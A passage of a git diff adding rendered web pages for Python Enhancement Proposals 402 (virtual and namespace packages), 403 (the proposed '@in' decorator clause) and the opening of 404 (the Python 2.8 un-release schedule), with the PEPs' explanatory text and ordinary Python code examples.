For that reason, various workarounds for this latter limitation exist, +circulated under the term “namespace packages”. The Python standard +library has provided one such workaround since Python 2.3 (via the +pkgutil.extend_path() function), and the “setuptools” package +provides another (via pkg_resources.declare_namespace()).

+

The workarounds themselves, however, fall prey to a third issue with +Python’s way of laying out packages in the filesystem.

+

Because a package must contain an __init__ module, any attempt +to distribute modules for that package must necessarily include that +__init__ module, if those modules are to be importable.

+

However, the very fact that each distribution of modules for a package +must contain this (duplicated) __init__ module, means that OS +vendors who package up these module distributions must somehow handle +the conflict caused by several module distributions installing that +__init__ module to the same location in the filesystem.

+

This led to the proposing of PEP 382 (“Namespace Packages”) - a way +to signal to Python’s import machinery that a directory was +importable, using unique filenames per module distribution.

+

However, there was more than one downside to this approach. +Performance for all import operations would be affected, and the +process of designating a package became even more complex. New +terminology had to be invented to explain the solution, and so on.

+

As terminology discussions continued on the Import-SIG, it soon became +apparent that the main reason it was so difficult to explain the +concepts related to “namespace packages” was because Python’s +current way of handling packages is somewhat underpowered, when +compared to other languages.

+

That is, in other popular languages with package systems, no special +term is needed to describe “namespace packages”, because all +packages generally behave in the desired fashion.

+

Rather than being an isolated single directory with a special marker +module (as in Python), packages in other languages are typically just +the union of appropriately-named directories across the entire +import or inclusion path.

+

In Perl, for example, the module Foo is always found in a +Foo.pm file, and a module Foo::Bar is always found in a +Foo/Bar.pm file. (In other words, there is One Obvious Way to +find the location of a particular module.)

+

This is because Perl considers a module to be different from a +package: the package is purely a namespace in which other modules +may reside, and is only coincidentally the name of a module as well.

+

In current versions of Python, however, the module and the package are +more tightly bound together. Foo is always a module – whether it +is found in Foo.py or Foo/__init__.py – and it is tightly +linked to its submodules (if any), which must reside in the exact +same directory where the __init__.py was found.

+

On the positive side, this design choice means that a package is quite +self-contained, and can be installed, copied, etc. as a unit just by +performing an operation on the package’s root directory.

+

On the negative side, however, it is non-intuitive for beginners, and +requires a more complex step to turn a module into a package. If +Foo begins its life as Foo.py, then it must be moved and +renamed to Foo/__init__.py.

+

Conversely, if you intend to create a Foo.Bar module from the +start, but have no particular module contents to put in Foo +itself, then you have to create an empty and seemingly-irrelevant +Foo/__init__.py file, just so that Foo.Bar can be imported.

+

(And these issues don’t just confuse newcomers to the language, +either: they annoy many experienced developers as well.)

+

So, after some discussion on the Import-SIG, this PEP was created +as an alternative to PEP 382, in an attempt to solve all of the +above problems, not just the “namespace package” use cases.

+

And, as a delightful side effect, the solution proposed in this PEP +does not affect the import performance of ordinary modules or +self-contained (i.e. __init__-based) packages.

+
+
+

The Solution

+

In the past, various proposals have been made to allow more intuitive +approaches to package directory layout. However, most of them failed +because of an apparent backward-compatibility problem.

+

That is, if the requirement for an __init__ module were simply +dropped, it would open up the possibility for a directory named, say, +string on sys.path, to block importing of the standard library +string module.

+

Paradoxically, however, the failure of this approach does not arise +from the elimination of the __init__ requirement!

+

Rather, the failure arises because the underlying approach takes for +granted that a package is just ONE thing, instead of two.

+

In truth, a package comprises two separate, but related entities: a +module (with its own, optional contents), and a namespace where +other modules or packages can be found.

+

In current versions of Python, however, the module part (found in +__init__) and the namespace for submodule imports (represented +by the __path__ attribute) are both initialized at the same time, +when the package is first imported.

+

And, if you assume this is the only way to initialize these two +things, then there is no way to drop the need for an __init__ +module, while still being backwards-compatible with existing directory +layouts.

+

After all, as soon as you encounter a directory on sys.path +matching the desired name, that means you’ve “found” the package, and +must stop searching, right?

+

Well, not quite.

+
+

A Thought Experiment

+

Let’s hop into the time machine for a moment, and pretend we’re back +in the early 1990s, shortly before Python packages and __init__.py +have been invented. But, imagine that we are familiar with +Perl-like package imports, and we want to implement a similar system +in Python.

+

We’d still have Python’s module imports to build on, so we could +certainly conceive of having Foo.py as a parent Foo module +for a Foo package. But how would we implement submodule and +subpackage imports?

+

Well, if we didn’t have the idea of __path__ attributes yet, +we’d probably just search sys.path looking for Foo/Bar.py.

+

But we’d only do it when someone actually tried to import +Foo.Bar.

+

NOT when they imported Foo.

+

And that lets us get rid of the backwards-compatibility problem +of dropping the __init__ requirement, back here in 2011.

+

How?

+

Well, when we import Foo, we’re not even looking for Foo/ +directories on sys.path, because we don’t care yet. The only +point at which we care, is the point when somebody tries to actually +import a submodule or subpackage of Foo.

+

That means that if Foo is a standard library module (for example), +and I happen to have a Foo directory on sys.path (without +an __init__.py, of course), then nothing breaks. The Foo +module is still just a module, and it’s still imported normally.

+
+
+

Self-Contained vs. “Virtual” Packages

+

Of course, in today’s Python, trying to import Foo.Bar will +fail if Foo is just a Foo.py module (and thus lacks a +__path__ attribute).

+

So, this PEP proposes to dynamically create a __path__, in the +case where one is missing.

+

That is, if I try to import Foo.Bar the proposed change to the +import machinery will notice that the Foo module lacks a +__path__, and will therefore try to build one before proceeding.

+

And it will do this by making a list of all the existing Foo/ +subdirectories of the directories listed in sys.path.

+

If the list is empty, the import will fail with ImportError, just +like today. But if the list is not empty, then it is saved in +a new Foo.__path__ attribute, making the module a “virtual +package”.

+

That is, because it now has a valid __path__, we can proceed +to import submodules or subpackages in the normal way.

+

Now, notice that this change does not affect “classic”, self-contained +packages that have an __init__ module in them. Such packages +already have a __path__ attribute (initialized at import time) +so the import machinery won’t try to create another one later.

+

This means that (for example) the standard library email package +will not be affected in any way by you having a bunch of unrelated +directories named email on sys.path. (Even if they contain +*.py files.)

+

But it does mean that if you want to turn your Foo module into +a Foo package, all you have to do is add a Foo/ directory +somewhere on sys.path, and start adding modules to it.

+

But what if you only want a “namespace package”? That is, a package +that is only a namespace for various separately-distributed +submodules and subpackages?

+

For example, if you’re Zope Corporation, distributing dozens of +separate tools like zc.buildout, each in packages under the zc +namespace, you don’t want to have to make and include an empty +zc.py in every tool you ship. (And, if you’re a Linux or other +OS vendor, you don’t want to deal with the package installation +conflicts created by trying to install ten copies of zc.py to the +same location!)

+

No problem. All we have to do is make one more minor tweak to the +import process: if the “classic” import process fails to find a +self-contained module or package (e.g., if import zc fails to find +a zc.py or zc/__init__.py), then we once more try to build a +__path__ by searching for all the zc/ directories on +sys.path, and putting them in a list.

+

If this list is empty, we raise ImportError. But if it’s +non-empty, we create an empty zc module, and put the list in +zc.__path__. Congratulations: zc is now a namespace-only, +“pure virtual” package! It has no module contents, but you can still +import submodules and subpackages from it, regardless of where they’re +located on sys.path.

+

(By the way, both of these additions to the import protocol (i.e. the +dynamically-added __path__, and dynamically-created modules) +apply recursively to child packages, using the parent package’s +__path__ in place of sys.path as a basis for generating a +child __path__. This means that self-contained and virtual +packages can contain each other without limitation, with the caveat +that if you put a virtual package inside a self-contained one, it’s +gonna have a really short __path__!)

+
+
+

Backwards Compatibility and Performance

+

Notice that these two changes only affect import operations that +today would result in ImportError. As a result, the performance +of imports that do not involve virtual packages is unaffected, and +potential backward compatibility issues are very restricted.

+

Today, if you try to import submodules or subpackages from a module +with no __path__, it’s an immediate error. And of course, if you +don’t have a zc.py or zc/__init__.py somewhere on sys.path +today, import zc would likewise fail.

+

Thus, the only potential backwards-compatibility issues are:

+
    +
  1. Tools that expect package directories to have an __init__ +module, that expect directories without an __init__ module +to be unimportable, or that expect __path__ attributes to be +static, will not recognize virtual packages as packages.

    (In practice, this just means that tools will need updating to +support virtual packages, e.g. by using pkgutil.walk_modules() +instead of using hardcoded filesystem searches.)

    +
  2. +
  3. Code that expects certain imports to fail may now do something +unexpected. This should be fairly rare in practice, as most sane, +non-test code does not import things that are expected not to +exist!
  4. +
+

The biggest likely exception to the above would be when a piece of +code tries to check whether some package is installed by importing +it. If this is done only by importing a top-level module (i.e., not +checking for a __version__ or some other attribute), and there +is a directory of the same name as the sought-for package on +sys.path somewhere, and the package is not actually installed, +then such code could be fooled into thinking a package is installed +that really isn’t.

+

For example, suppose someone writes a script (datagen.py) +containing the following code:

+
try:
+    import json
+except ImportError:
+    import simplejson as json
+
+
+

And runs it in a directory laid out like this:

+
datagen.py
+json/
+    foo.js
+    bar.js
+
+
+

If import json succeeded due to the mere presence of the json/ +subdirectory, the code would incorrectly believe that the json +module was available, and proceed to fail with an error.

+

However, we can prevent corner cases like these from arising, simply +by making one small change to the algorithm presented so far. Instead +of allowing you to import a “pure virtual” package (like zc), +we allow only importing of the contents of virtual packages.

+

That is, a statement like import zc should raise ImportError +if there is no zc.py or zc/__init__.py on sys.path. But, +doing import zc.buildout should still succeed, as long as there’s +a zc/buildout.py or zc/buildout/__init__.py on sys.path.

+

In other words, we don’t allow pure virtual packages to be imported +directly, only modules and self-contained packages. (This is an +acceptable limitation, because there is no functional value to +importing such a package by itself. After all, the module object +will have no contents until you import at least one of its +subpackages or submodules!)

+

Once zc.buildout has been successfully imported, though, there +will be a zc module in sys.modules, and trying to import it +will of course succeed. We are only preventing an initial import +from succeeding, in order to prevent false-positive import successes +when clashing subdirectories are present on sys.path.

+

So, with this slight change, the datagen.py example above will +work correctly. When it does import json, the mere presence of a +json/ directory will simply not affect the import process at all, +even if it contains .py files. The json/ directory will still +only be searched in the case where an import like import +json.converter is attempted.

+

Meanwhile, tools that expect to locate packages and modules by +walking a directory tree can be updated to use the existing +pkgutil.walk_modules() API, and tools that need to inspect +packages in memory should use the other APIs described in the +Standard Library Changes/Additions section below.

+
+
+
+

Specification

+

A change is made to the existing import process, when importing +names containing at least one . – that is, imports of modules +that have a parent package.

+

Specifically, if the parent package does not exist, or exists but +lacks a __path__ attribute, an attempt is first made to create a +“virtual path” for the parent package (following the algorithm +described in the section on virtual paths, below).

+

If the computed “virtual path” is empty, an ImportError results, +just as it would today. However, if a non-empty virtual path is +obtained, the normal import of the submodule or subpackage proceeds, +using that virtual path to find the submodule or subpackage. (Just +as it would have with the parent’s __path__, if the parent package +had existed and had a __path__.)

+

When a submodule or subpackage is found (but not yet loaded), +the parent package is created and added to sys.modules (if it +didn’t exist before), and its __path__ is set to the computed +virtual path (if it wasn’t already set).

+

In this way, when the actual loading of the submodule or subpackage +occurs, it will see a parent package existing, and any relative +imports will work correctly. However, if no submodule or subpackage +exists, then the parent package will not be created, nor will a +standalone module be converted into a package (by the addition of a +spurious __path__ attribute).

+

Note, by the way, that this change must be applied recursively: that +is, if foo and foo.bar are pure virtual packages, then +import foo.bar.baz must wait until foo.bar.baz is found before +creating module objects for both foo and foo.bar, and then +create both of them together, properly setting the foo module’s +.bar attribute to point to the foo.bar module.

+

In this way, pure virtual packages are never directly importable: +an import foo or import foo.bar by itself will fail, and the +corresponding modules will not appear in sys.modules until they +are needed to point to a successfully imported submodule or +self-contained subpackage.

+
+

Virtual Paths

+

A virtual path is created by obtaining a PEP 302 “importer” object for +each of the path entries found in sys.path (for a top-level +module) or the parent __path__ (for a submodule).

+

(Note: because sys.meta_path importers are not associated with +sys.path or __path__ entry strings, such importers do not +participate in this process.)

+

Each importer is checked for a get_subpath() method, and if +present, the method is called with the full name of the module/package +the path is being constructed for. The return value is either a +string representing a subdirectory for the requested package, or +None if no such subdirectory exists.

+

The strings returned by the importers are added to the path list +being built, in the same order as they are found. (None values +and missing get_subpath() methods are simply skipped.)

+

The resulting list (whether empty or not) is then stored in a +sys.virtual_package_paths dictionary, keyed by module name.

+

This dictionary has two purposes. First, it serves as a cache, in +the event that more than one attempt is made to import a submodule +of a virtual package.

+

Second, and more importantly, the dictionary can be used by code that +extends sys.path at runtime to update imported packages’ +__path__ attributes accordingly. (See Standard Library +Changes/Additions below for more details.)

+

In Python code, the virtual path construction algorithm would look +something like this:

+
def get_virtual_path(modulename, parent_path=None):
+
+    if modulename in sys.virtual_package_paths:
+        return sys.virtual_package_paths[modulename]
+
+    if parent_path is None:
+        parent_path = sys.path
+
+    path = []
+
+    for entry in parent_path:
+        # Obtain a PEP 302 importer object - see pkgutil module
+        importer = pkgutil.get_importer(entry)
+
+        if hasattr(importer, 'get_subpath'):
+            subpath = importer.get_subpath(modulename)
+            if subpath is not None:
+                path.append(subpath)
+
+    sys.virtual_package_paths[modulename] = path
+    return path
+
+
+

And a function like this one should be exposed in the standard +library as e.g. imp.get_virtual_path(), so that people creating +__import__ replacements or sys.meta_path hooks can reuse it.

+
+
+

Standard Library Changes/Additions

+

The pkgutil module should be updated to handle this +specification appropriately, including any necessary changes to +extend_path(), iter_modules(), etc.

+

Specifically the proposed changes and additions to pkgutil are:

+
    +
  • A new extend_virtual_paths(path_entry) function, to extend +existing, already-imported virtual packages’ __path__ attributes +to include any portions found in a new sys.path entry. This +function should be called by applications extending sys.path +at runtime, e.g. when adding a plugin directory or an egg to the +path.

    The implementation of this function does a simple top-down traversal +of sys.virtual_package_paths, and performs any necessary +get_subpath() calls to identify what path entries need to be +added to the virtual path for that package, given that path_entry +has been added to sys.path. (Or, in the case of sub-packages, +adding a derived subpath entry, based on their parent package’s +virtual path.)

    +

    (Note: this function must update both the path values in +sys.virtual_package_paths as well as the __path__ attributes +of any corresponding modules in sys.modules, even though in the +common case they will both be the same list object.)

    +
  • +
  • A new iter_virtual_packages(parent='') function to allow +top-down traversal of virtual packages from +sys.virtual_package_paths, by yielding the child virtual +packages of parent. For example, calling +iter_virtual_packages("zope") might yield zope.app +and zope.products (if they are virtual packages listed in +sys.virtual_package_paths), but not zope.foo.bar. +(This function is needed to implement extend_virtual_paths(), +but is also potentially useful for other code that needs to inspect +imported virtual packages.)
  • +
  • ImpImporter.iter_modules() should be changed to also detect and +yield the names of modules found in virtual packages.
  • +
+

In addition to the above changes, the zipimport importer should +have its iter_modules() implementation similarly changed. (Note: +current versions of Python implement this via a shim in pkgutil, +so technically this is also a change to pkgutil.)

+

Last, but not least, the imp module (or importlib, if +appropriate) should expose the algorithm described in the virtual +paths section above, as a +get_virtual_path(modulename, parent_path=None) function, so that +creators of __import__ replacements can use it.

+
+
+

Implementation Notes

+

For users, developers, and distributors of virtual packages:

+
    +
  • While virtual packages are easy to set up and use, there is still +a time and place for using self-contained packages. While it’s not +strictly necessary, adding an __init__ module to your +self-contained packages lets users of the package (and Python +itself) know that all of the package’s code will be found in +that single subdirectory. In addition, it lets you define +__all__, expose a public API, provide a package-level docstring, +and do other things that make more sense for a self-contained +project than for a mere “namespace” package.
  • +
  • sys.virtual_package_paths is allowed to contain entries for +non-existent or not-yet-imported package names; code that uses its +contents should not assume that every key in this dictionary is also +present in sys.modules or that importing the name will +necessarily succeed.
  • +
  • If you are changing a currently self-contained package into a +virtual one, it’s important to note that you can no longer use its +__file__ attribute to locate data files stored in a package +directory. Instead, you must search __path__ or use the +__file__ of a submodule adjacent to the desired files, or +of a self-contained subpackage that contains the desired files.

    (Note: this caveat is already true for existing users of “namespace +packages” today. That is, it is an inherent result of being able +to partition a package, that you must know which partition the +desired data file lives in. We mention it here simply so that +new users converting from self-contained to virtual packages will +also be aware of it.)

    +
  • +
  • XXX what is the __file__ of a “pure virtual” package? None? +Some arbitrary string? The path of the first directory with a +trailing separator? No matter what we put, some code is +going to break, but the last choice might allow some code to +accidentally work. Is that good or bad?
  • +
+

For those implementing PEP 302 importer objects:

+
    +
  • Importers that support the iter_modules() method (used by +pkgutil to locate importable modules and packages) and want to +add virtual package support should modify their iter_modules() +method so that it discovers and lists virtual packages as well as +standard modules and packages. To do this, the importer should +simply list all immediate subdirectory names in its jurisdiction +that are valid Python identifiers.

    XXX This might list a lot of not-really-packages. Should we +require importable contents to exist? If so, how deep do we +search, and how do we prevent e.g. link loops, or traversing onto +different filesystems, etc.? Ick. Also, if virtual packages are +listed, they still can’t be imported, which is a problem for the +way that pkgutil.walk_modules() is currently implemented.

    +
  • +
  • “Meta” importers (i.e., importers placed on sys.meta_path) do +not need to implement get_subpath(), because the method +is only called on importers corresponding to sys.path entries +and __path__ entries. If a meta importer wishes to support +virtual packages, it must do so entirely within its own +find_module() implementation.

    Unfortunately, it is unlikely that any such implementation will be +able to merge its package subpaths with those of other meta +importers or sys.path importers, so the meaning of “supporting +virtual packages” for a meta importer is currently undefined!

    +

    (However, since the intended use case for meta importers is to +replace Python’s normal import process entirely for some subset of +modules, and the number of such importers currently implemented is +quite small, this seems unlikely to be a big issue in practice.)

    +
  • +
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0402.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0403/index.html b/pep-0403/index.html new file mode 100644 index 00000000000..728d8d9b728 --- /dev/null +++ b/pep-0403/index.html @@ -0,0 +1,615 @@ + + + + + + + + PEP 403 – General purpose decorator clause (aka “@in” clause) | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 403 – General purpose decorator clause (aka “@in” clause)

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
13-Oct-2011
+
Python-Version:
+
3.4
+
Post-History:
+
13-Oct-2011
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the addition of a new @in decorator clause that makes +it possible to override the name binding step of a function or class +definition.

+

The new clause accepts a single simple statement that can make a forward +reference to decorated function or class definition.

+

This new clause is designed to be used whenever a “one-shot” function or +class is needed, and placing the function or class definition before the +statement that uses it actually makes the code harder to read. It also +avoids any name shadowing concerns by making sure the new name is visible +only to the statement in the @in clause.

+

This PEP is based heavily on many of the ideas in PEP 3150 (Statement Local +Namespaces) so some elements of the rationale will be familiar to readers of +that PEP. Both PEPs remain deferred for the time being, primarily due to the +lack of compelling real world use cases in either PEP.

+
+
+

Basic Examples

+

Before diving into the long history of this problem and the detailed +rationale for this specific proposed solution, here are a few simple +examples of the kind of code it is designed to simplify.

+

As a trivial example, a weakref callback could be defined as follows:

+
@in x = weakref.ref(target, report_destruction)
+def report_destruction(obj):
+    print("{} is being destroyed".format(obj))
+
+
+

This contrasts with the current (conceptually) “out of order” syntax for +this operation:

+
def report_destruction(obj):
+    print("{} is being destroyed".format(obj))
+
+x = weakref.ref(target, report_destruction)
+
+
+

That structure is OK when you’re using the callable multiple times, but +it’s irritating to be forced into it for one-off operations.

+

If the repetition of the name seems especially annoying, then a throwaway +name like f can be used instead:

+
@in x = weakref.ref(target, f)
+def f(obj):
+    print("{} is being destroyed".format(obj))
+
+
+

Similarly, a sorted operation on a particularly poorly defined type could +now be defined as:

+
@in sorted_list = sorted(original, key=f)
+def f(item):
+    try:
+        return item.calc_sort_order()
+    except NotSortableError:
+        return float('inf')
+
+
+

Rather than:

+
def force_sort(item):
+    try:
+        return item.calc_sort_order()
+    except NotSortableError:
+        return float('inf')
+
+sorted_list = sorted(original, key=force_sort)
+
+
+

And early binding semantics in a list comprehension could be attained via:

+
@in funcs = [adder(i) for i in range(10)]
+def adder(i):
+    return lambda x: x + i
+
+
+
+
+

Proposal

+

This PEP proposes the addition of a new @in clause that is a variant +of the existing class and function decorator syntax.

+

The new @in clause precedes the decorator lines, and allows forward +references to the trailing function or class definition.

+

The trailing function or class definition is always named - the name of +the trailing definition is then used to make the forward reference from the +@in clause.

+

The @in clause is allowed to contain any simple statement (including +those that don’t make any sense in that context, such as pass - while +such code would be legal, there wouldn’t be any point in writing it). This +permissive structure is easier to define and easier to explain, but a more +restrictive approach that only permits operations that “make sense” would +also be possible (see PEP 3150 for a list of possible candidates).

+

The @in clause will not create a new scope - all name binding +operations aside from the trailing function or class definition will affect +the containing scope.

+

The name used in the trailing function or class definition is only visible +from the associated @in clause, and behaves as if it was an ordinary +variable defined in that scope. If any nested scopes are created in either +the @in clause or the trailing function or class definition, those scopes +will see the trailing function or class definition rather than any other +bindings for that name in the containing scope.

+

In a very real sense, this proposal is about making it possible to override +the implicit “name = <defined function or class>” name binding operation +that is part of every function or class definition, specifically in those +cases where the local name binding isn’t actually needed.

+

Under this PEP, an ordinary class or function definition:

+
@deco2
+@deco1
+def name():
+    ...
+
+
+

can be explained as being roughly equivalent to:

+
@in name = deco2(deco1(name))
+def name():
+    ...
+
+
+
+

Syntax Change

+

Syntactically, only one new grammar rule is needed:

+
in_stmt: '@in' simple_stmt decorated
+
+
+

Grammar: http://hg.python.org/cpython/file/default/Grammar/Grammar

+
+
+
+

Design Discussion

+
+

Background

+

The question of “multi-line lambdas” has been a vexing one for many +Python users for a very long time, and it took an exploration of Ruby’s +block functionality for me to finally understand why this bugs people +so much: Python’s demand that the function be named and introduced +before the operation that needs it breaks the developer’s flow of thought. +They get to a point where they go “I need a one-shot operation that does +<X>”, and instead of being able to just say that directly, they instead +have to back up, name a function to do <X>, then call that function from +the operation they actually wanted to do in the first place. Lambda +expressions can help sometimes, but they’re no substitute for being able to +use a full suite.

+

Ruby’s block syntax also heavily inspired the style of the solution in this +PEP, by making it clear that even when limited to one anonymous function per +statement, anonymous functions could still be incredibly useful. Consider how +many constructs Python has where one expression is responsible for the bulk of +the heavy lifting:

+
    +
  • comprehensions, generator expressions, map(), filter()
  • +
  • key arguments to sorted(), min(), max()
  • +
  • partial function application
  • +
  • provision of callbacks (e.g. for weak references or asynchronous IO)
  • +
  • array broadcast operations in NumPy
  • +
+

However, adopting Ruby’s block syntax directly won’t work for Python, since +the effectiveness of Ruby’s blocks relies heavily on various conventions in +the way functions are defined (specifically, using Ruby’s yield syntax +to call blocks directly and the &arg mechanism to accept a block as a +function’s final argument).

+

Since Python has relied on named functions for so long, the signatures of +APIs that accept callbacks are far more diverse, thus requiring a solution +that allows one-shot functions to be slotted in at the appropriate location.

+

The approach taken in this PEP is to retain the requirement to name the +function explicitly, but allow the relative order of the definition and the +statement that references it to be changed to match the developer’s flow of +thought. The rationale is essentially the same as that used when introducing +decorators, but covering a broader set of applications.

+
+
+

Relation to PEP 3150

+

PEP 3150 (Statement Local Namespaces) describes its primary motivation +as being to elevate ordinary assignment statements to be on par with class +and def statements where the name of the item to be defined is presented +to the reader in advance of the details of how the value of that item is +calculated. This PEP achieves the same goal in a different way, by allowing +the simple name binding of a standard function definition to be replaced +with something else (like assigning the result of the function to a value).

+

Despite having the same author, the two PEPs are in direct competition with +each other. PEP 403 represents a minimalist approach that attempts to achieve +useful functionality with a minimum of change from the status quo. This PEP +instead aims for a more flexible standalone statement design, which requires +a larger degree of change to the language.

+

Note that where PEP 403 is better suited to explaining the behaviour of +generator expressions correctly, this PEP is better able to explain the +behaviour of decorator clauses in general. Both PEPs support adequate +explanations for the semantics of container comprehensions.

+
+
+

Keyword Choice

+

The proposal definitely requires some kind of prefix to avoid parsing +ambiguity and backwards compatibility problems with existing constructs. +It also needs to be clearly highlighted to readers, since it declares that +the following piece of code is going to be executed only after the trailing +function or class definition has been executed.

+

The in keyword was chosen as an existing keyword that can be used to +denote the concept of a forward reference.

+

The @ prefix was included in order to exploit the fact that Python +programmers are already used to decorator syntax as an indication of +out of order execution, where the function or class is actually defined +first and then decorators are applied in reverse order.

+

For functions, the construct is intended to be read as “in <this statement +that references NAME> define NAME as a function that does <operation>”.

+

The mapping to English prose isn’t as obvious for the class definition case, +but the concept remains the same.

+
+
+

Better Debugging Support for Functions and Classes with Short Names

+

One of the objections to widespread use of lambda expressions is that they +have a negative effect on traceback intelligibility and other aspects of +introspection. Similar objections are raised regarding constructs that +promote short, cryptic function names (including this one, which requires +that the name of the trailing definition be supplied at least twice, +encouraging the use of shorthand placeholder names like f).

+

However, the introduction of qualified names in PEP 3155 means that even +anonymous classes and functions will now have different representations if +they occur in different scopes. For example:

+
>>> def f():
+...     return lambda: y
+...
+>>> f()
+<function f.<locals>.<lambda> at 0x7f6f46faeae0>
+
+
+

Anonymous functions (or functions that share a name) within the same scope +will still share representations (aside from the object ID), but this is +still a major improvement over the historical situation where everything +except the object ID was identical.

+
+
+

Possible Implementation Strategy

+

This proposal has at least one titanic advantage over PEP 3150: +implementation should be relatively straightforward.

+

The @in clause will be included in the AST for the associated function or +class definition and the statement that references it. When the @in +clause is present, it will be emitted in place of the local name binding +operation normally implied by a function or class definition.

+

The one potentially tricky part is changing the meaning of the references to +the statement local function or namespace while within the scope of the +in statement, but that shouldn’t be too hard to address by maintaining +some additional state within the compiler (it’s much easier to handle this +for a single name than it is for an unknown number of names in a full +nested suite).

+
+
+

Explaining Container Comprehensions and Generator Expressions

+

One interesting feature of the proposed construct is that it can be used as +a primitive to explain the scoping and execution order semantics of +both generator expressions and container comprehensions:

+
seq2 = [x for x in y if q(x) for y in seq if p(y)]
+
+# would be equivalent to
+
+@in seq2 = f(seq):
+def f(seq)
+    result = []
+    for y in seq:
+        if p(y):
+            for x in y:
+                if q(x):
+                    result.append(x)
+    return result
+
+
+

The important point in this expansion is that it explains why comprehensions +appear to misbehave at class scope: only the outermost iterator is evaluated +at class scope, while all predicates, nested iterators and value expressions +are evaluated inside a nested scope.

+

An equivalent expansion is possible for generator expressions:

+
gen = (x for x in y if q(x) for y in seq if p(y))
+
+# would be equivalent to
+
+@in gen = g(seq):
+def g(seq)
+    for y in seq:
+        if p(y):
+            for x in y:
+                if q(x):
+                    yield x
+
+
+
+
+
+

More Examples

+

Calculating attributes without polluting the local namespace (from os.py):

+
# Current Python (manual namespace cleanup)
+def _createenviron():
+    ... # 27 line function
+
+environ = _createenviron()
+del _createenviron
+
+# Becomes:
+@in environ = _createenviron()
+def _createenviron():
+    ... # 27 line function
+
+
+

Loop early binding:

+
# Current Python (default argument hack)
+funcs = [(lambda x, i=i: x + i) for i in range(10)]
+
+# Becomes:
+@in funcs = [adder(i) for i in range(10)]
+def adder(i):
+    return lambda x: x + i
+
+# Or even:
+@in funcs = [adder(i) for i in range(10)]
+def adder(i):
+    @in return incr
+    def incr(x):
+        return x + i
+
+
+

A trailing class can be used as a statement local namespace:

+
# Evaluate subexpressions only once
+@in c = math.sqrt(x.a*x.a + x.b*x.b)
+class x:
+    a = calculate_a()
+    b = calculate_b()
+
+
+

A function can be bound directly to a location which isn’t a valid +identifier:

+
@in dispatch[MyClass] = f
+def f():
+    ...
+
+
+

Constructs that verge on decorator abuse can be eliminated:

+
# Current Python
+@call
+def f():
+    ...
+
+# Becomes:
+@in f()
+def f():
+    ...
+
+
+
+
+

Reference Implementation

+

None as yet.

+
+
+

Acknowledgements

+

Huge thanks to Gary Bernhardt for being blunt in pointing out that I had no +idea what I was talking about in criticising Ruby’s blocks, kicking off a +rather enlightening process of investigation.

+
+
+

Rejected Concepts

+

To avoid retreading previously covered ground, some rejected alternatives +are documented in this section.

+
+

Omitting the decorator prefix character

+

Earlier versions of this proposal omitted the @ prefix. However, without +that prefix, the bare in keyword didn’t associate the clause strongly +enough with the subsequent function or class definition. Reusing the +decorator prefix and explicitly characterising the new construct as a kind +of decorator clause is intended to help users link the two concepts and +see them as two variants of the same idea.

+
+
+

Anonymous Forward References

+

A previous incarnation of this PEP (see [1]) proposed a syntax where the +new clause was introduced with : and the forward reference was written +using @. Feedback on this variant was almost universally +negative, as it was considered both ugly and excessively magical:

+
:x = weakref.ref(target, @)
+def report_destruction(obj):
+    print("{} is being destroyed".format(obj))
+
+
+

A more recent variant always used ... for forward references, along +with genuinely anonymous function and class definitions. However, this +degenerated quickly into a mass of unintelligible dots in more complex +cases:

+
in funcs = [...(i) for i in range(10)]
+def ...(i):
+  in return ...
+  def ...(x):
+      return x + i
+
+in c = math.sqrt(....a*....a + ....b*....b)
+class ...:
+  a = calculate_a()
+  b = calculate_b()
+
+
+
+
+

Using a nested suite

+

The problems with using a full nested suite are best described in +PEP 3150. It’s comparatively difficult to implement properly, the scoping +semantics are harder to explain and it creates quite a few situations where +there are two ways to do it without clear guidelines for choosing between +them (as almost any construct that can be expressed with ordinary imperative +code could instead be expressed using a given statement). While the PEP does +propose some new PEP 8 guidelines to help address that last problem, the +difficulties in implementation are not so easily dealt with.

+

By contrast, the decorator inspired syntax in this PEP explicitly limits the +new feature to cases where it should actually improve readability, rather +than harming it. As in the case of the original introduction of decorators, +the idea of this new syntax is that if it can be used (i.e. the local name +binding of the function is completely unnecessary) then it probably should +be used.

+

Another possible variant of this idea is to keep the decorator based +semantics of this PEP, while adopting the prettier syntax from PEP 3150:

+
x = weakref.ref(target, report_destruction) given:
+    def report_destruction(obj):
+        print("{} is being destroyed".format(obj))
+
+
+

There are a couple of problems with this approach. The main issue is that +this syntax variant uses something that looks like a suite, but really isn’t +one. A secondary concern is that it’s not clear how the compiler will know +which name(s) in the leading expression are forward references (although +that could potentially be addressed through a suitable definition of the +suite-that-is-not-a-suite in the language grammar).

+

However, a nested suite has not yet been ruled out completely. The latest +version of PEP 3150 uses explicit forward reference and name binding +schemes that greatly simplify the semantics of the statement, and it +does offer the advantage of allowing the definition of arbitrary +subexpressions rather than being restricted to a single function or +class definition.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0403.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0404/index.html b/pep-0404/index.html new file mode 100644 index 00000000000..1114a154487 --- /dev/null +++ b/pep-0404/index.html @@ -0,0 +1,296 @@ + + + + + + + + PEP 404 – Python 2.8 Un-release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 404 – Python 2.8 Un-release Schedule

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
09-Nov-2011
+
Python-Version:
+
2.8
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the un-development and un-release schedule for Python +2.8.

+
+
+

Un-release Manager and Crew

+ + + + + + + + + + + +
PositionName
2.8 Un-release ManagerCardinal Biggles
+
+
+

Un-release Schedule

+

The current un-schedule is:

+
    +
